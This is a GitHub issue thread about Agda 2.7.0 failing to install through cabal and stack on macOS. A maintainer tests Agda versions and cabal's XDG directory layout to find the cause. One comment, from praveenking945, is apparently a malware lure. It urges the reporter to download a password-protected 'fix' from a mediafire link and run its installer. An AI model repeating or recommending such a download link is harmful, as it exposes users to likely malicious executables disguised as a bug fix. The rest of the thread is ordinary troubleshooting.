### ISSUE TITLE
Both stack and cabal fail to install Agda

### ISSUE THREAD

**Issue by ningcng** [agda/agda#7455]
Tried cabal 3.12.1.0/3.10.3.0 and ghc 9.6.6 on macOS Sonoma Kernel 23.6.0 (Hardware: M3 Max)
```cabal install Agda```

```
[2 of 2] Linking dist/build/agda/agda
Installing executable agda-mode in /Users/ningcng/.local/state/cabal/store/ghc-9.6.6/incoming/new-26892/Users/ningcng/.local/state/cabal/store/ghc-9.6.6/Agd-2.7.0-12a325e8/bin
Warning: The directory
/Users/ningcng/.local/state/cabal/store/ghc-9.6.6/incoming/new-26892/Users/ningcng/.local/state/cabal/store/ghc-9.6.6/Agd-2.7.0-12a325e8/bin
is not in the system search path.
Installing library in /Users/ningcng/.local/state/cabal/store/ghc-9.6.6/incoming/new-26892/Users/ningcng/.local/state/cabal/store/ghc-9.6.6/Agd-2.7.0-12a325e8/lib
Installing executable agda in /Users/ningcng/.local/state/cabal/store/ghc-9.6.6/incoming/new-26892/Users/ningcng/.local/state/cabal/store/ghc-9.6.6/Agd-2.7.0-12a325e8/bin
Warning: The directory
/Users/ningcng/.local/state/cabal/store/ghc-9.6.6/incoming/new-26892/Users/ningcng/.local/state/cabal/store/ghc-9.6.6/Agd-2.7.0-12a325e8/bin
is not in the system search path.
Generating Agda library interface files...
Error: setup: filepath wildcard
'lib/prim/_build/2.7.0/agda/Agda/Builtin/Bool.agdai' does not match any files.
```

Stack fails with Agda 2.6.4.3 with the same error.

Installing 2.6.3 works fine.

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by andreasabel** [comment]
Thanks, @ningcng for the report!  
It is not easy to find the cause of the problem because I do not have access to your machine.

One lead to explore is whether this is connected to the new support for the XDG directory structure that cabal implemented in 3.10.
> /Users/ningcng/.local/state/cabal/store/

Maybe we are looking for the generated `.agdai` files in the wrong place now.
> 'lib/prim/_build/2.7.0/agda/Agda/Builtin/Bool.agdai' does not match any files.

Could you try whether installation succeeds with cabal 3.8?

**Comment by andreasabel** [comment]
@ningcng wrote:
> Installing 2.6.3 works fine.

Could you please try installing 2.6.4 or 2.6.4.1 (with cabal 3.12)?

That would test whether PR #6988, released with Agda 2.6.4.2, is connected to this issue.
- #6988

**Comment by ningcng** [comment]
Installing 2.6.4.1 with cabal 3.10/3.12 works.

**Comment by andreasabel** [comment]
Thanks!

I tried to install Agda-2.7.0 with cabal-3.12 and GHC 9.10 on a fresh user account so as to get the XDG directory layout.  It succeeded.  So unfortunately I could not reproduce the problem yet.

@ningcng : Could you try to provide more information?  E.g. supplying `-v3` to `cabal` could give some context around the failure that could help localize the problem.

**Comment by andreasabel** [comment]
Without further information, I could not reproduce the issue.  However, PR #7465 might help working around the problem.
@ningcng Please reopen a new issue with more information should the installation problem persist in Agda 2.7.0.1.
